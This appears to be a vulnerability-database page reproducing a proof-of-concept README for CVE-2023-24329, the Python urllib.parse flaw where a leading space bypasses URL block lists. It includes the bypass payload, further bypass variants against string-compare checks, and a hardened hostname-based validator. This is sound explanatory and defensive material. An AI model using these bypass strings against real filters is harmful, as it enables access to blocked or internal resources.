Related vulnerability
Title: Python input validation vulnerability (CVE-2023-24329)
Description: Python is an open-source, object-oriented programming language from the Python Software Foundation. It is extensible, supports modules and packages, and runs on many platforms. Python versions before 3.11.4 contain an input validation vulnerability in `urllib.parse`: an attacker can bypass a URL block list by supplying a URL that begins with whitespace characters.
Description
Example of CVE-2023-24329
Introduction
# Intro
The URL parsing functions focus on splitting a URL string into its components, or on combining URL components into a URL string.
- [urllib.parse.urlparse](https://docs.python.org/3/library/urllib.parse.html#url-parsing)
**Simply put**, `urllib.parse` is used for parsing URLs, and when an application relies on it to enforce a URL block list, the check can be bypassed by prepending whitespace to the URL. Python versions before 3.11.4 are affected: the fix makes `urlsplit()` strip leading C0 control and space characters (U+0000 through U+0020) before parsing, as the WHATWG URL specification requires, so the scheme and host of such a URL are recognised again.
# PoC
Let's break down `example.py`.
Here is a set of websites that should not be accessed:
```python
blocked_list = [
    "http://example.com/",
    "http://example2.com/"
]
```
This function checks whether a URL is on the block list; if it is, it should return `URL Blocked`. Note that it compares the re-serialised URL string, not the hostname:
```python
import urllib.parse

def is_url_blocked(url):
    # Round-trip the URL through the parser and compare the result as a string
    parse = urllib.parse.urlparse(url).geturl()
    if parse in blocked_list: return 'URL Blocked'
    else: return 'Bypassed'
```
Now I add two URLs and check whether either of them is blocked:
```python
payload1 = " http://example.com/"
payload2 = "http://example.com/"
print(
    is_url_blocked(payload1),
    "\n",
    is_url_blocked(payload2)
)
```
`payload1` is the one that bypasses `is_url_blocked()`. With a leading space, a vulnerable `urlparse()` does not recognise `http` as the scheme (the first character is not a letter) and finds no netloc, so the whole string ends up in `path`, and `.geturl()` hands back `" http://example.com/"` with the space still in front. That string is not in `blocked_list`, so the check falls through to
```
Bypassed
```
For `payload2` the URL round-trips unchanged and we get
```
URL Blocked
```
The bypass only matters if the component that later fetches the URL tolerates the leading whitespace (browsers do, following the WHATWG URL specification), which is exactly why the fix aligns `urlsplit()` with that specification.
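The following is an added example, not part of the original PoC, showing a hostname-based check that is not fooled by a leading space or control character on either a vulnerable or a patched interpreter, for the block-list use of `urllib.parse` described in the intro and the PoC above. It goes beyond the CVE itself: because the page's check compares full URL strings, it is also bypassed on fixed Python by a change of case in the host, userinfo, an explicit port, or a missing trailing slash, and `naive_is_url_blocked()` reproduces that check only for comparison. `BLOCKED_HOSTS`, `check_url()` and the sample URLs are assumptions made for this example.

```python
import urllib.parse

# Characters the CVE-2023-24329 fix strips from the front of a URL before
# parsing: the WHATWG "C0 control or space" set, U+0000 through U+0020.
C0_CONTROL_OR_SPACE = "".join(chr(c) for c in range(0x21))

# Assumed block list for this example, keyed by hostname rather than by the
# full URL string, so every spelling of the same host maps to one entry.
BLOCKED_HOSTS = {"example.com", "example2.com"}


def naive_is_url_blocked(url):
    """The page's string-compare check, reproduced here for comparison only."""
    blocked_list = ["http://example.com/", "http://example2.com/"]
    parse = urllib.parse.urlparse(url).geturl()
    return "URL Blocked" if parse in blocked_list else "Bypassed"


def check_url(url):
    """Gate for an outbound fetch. Returns (blocked, reason).

    The gate is allow-list shaped: anything that does not parse into an
    http(s) URL with a hostname is refused, so a parser quirk fails towards
    "blocked" instead of towards "bypassed".
    """
    if not url:
        return True, "empty URL"
    # Reject, rather than strip, leading control/space characters. On an
    # unpatched urlsplit() such input yields no scheme and no netloc, while the
    # HTTP client that later fetches it may drop the whitespace and reach the
    # host anyway; refusing removes the disagreement between the two parsers.
    if url[0] in C0_CONTROL_OR_SPACE:
        return True, "leading control or space character"
    try:
        parts = urllib.parse.urlsplit(url)
    except ValueError as exc:  # e.g. "Invalid IPv6 URL"
        return True, "unparseable URL: %s" % exc
    if parts.scheme not in ("http", "https"):
        return True, "scheme not http(s): %r" % parts.scheme
    # .hostname is lower-cased and has userinfo, port and IPv6 brackets removed,
    # so "http://user:pw@EXAMPLE.com:8080/" compares as "example.com".
    host = parts.hostname
    if not host:
        return True, "no hostname"
    host = host.rstrip(".")  # a trailing dot is the same name to DNS
    if host in BLOCKED_HOSTS:
        return True, "host %s is on the block list" % host
    return False, "allowed: %s" % host


if __name__ == "__main__":
    # Constructed sample inputs: the CVE payload, control-character variants,
    # and bypasses that work against the string compare on any Python version.
    samples = [
        "http://example.com/",
        " http://example.com/",
        "\t\x00http://example.com/",
        "http://EXAMPLE.com/",
        "http://user:pw@example.com:8080/",
        "http://example.com",
        "http://example.com./",
        "file:///etc/passwd",
        "//example.com/",
        "https://example.org/",
    ]
    for url in samples:
        blocked, reason = check_url(url)
        print("%-36r naive=%-12s hardened=%s (%s)"
              % (url, naive_is_url_blocked(url),
                 "blocked" if blocked else "allowed", reason))
```

Running the script prints the naive and hardened verdicts side by side; the naive verdict for `" http://example.com/"` depends on the interpreter version, while `check_url()` refuses it everywhere. Rejecting leading control characters outright, instead of normalising them away, is deliberate: a block list should not have to guess which of several downstream parsers will see the string.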
# Support
If you would like to support me with a donation, I recommend you give it to someone who really needs it. If you do so, then consider that I have earned your support.
<a href="https://www.buymeacoffee.com/jawadpy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png" alt="Buy Me A Coffee" style="height: 60px !important;width: 217px !important;" ></a>
File snapshot
[4.0K] /data/pocs/36a2d3a2f97e35e4e33191706ed0f2d257edb98c
├── [ 468] example.py
└── [1.7K] README.md
0 directories, 2 files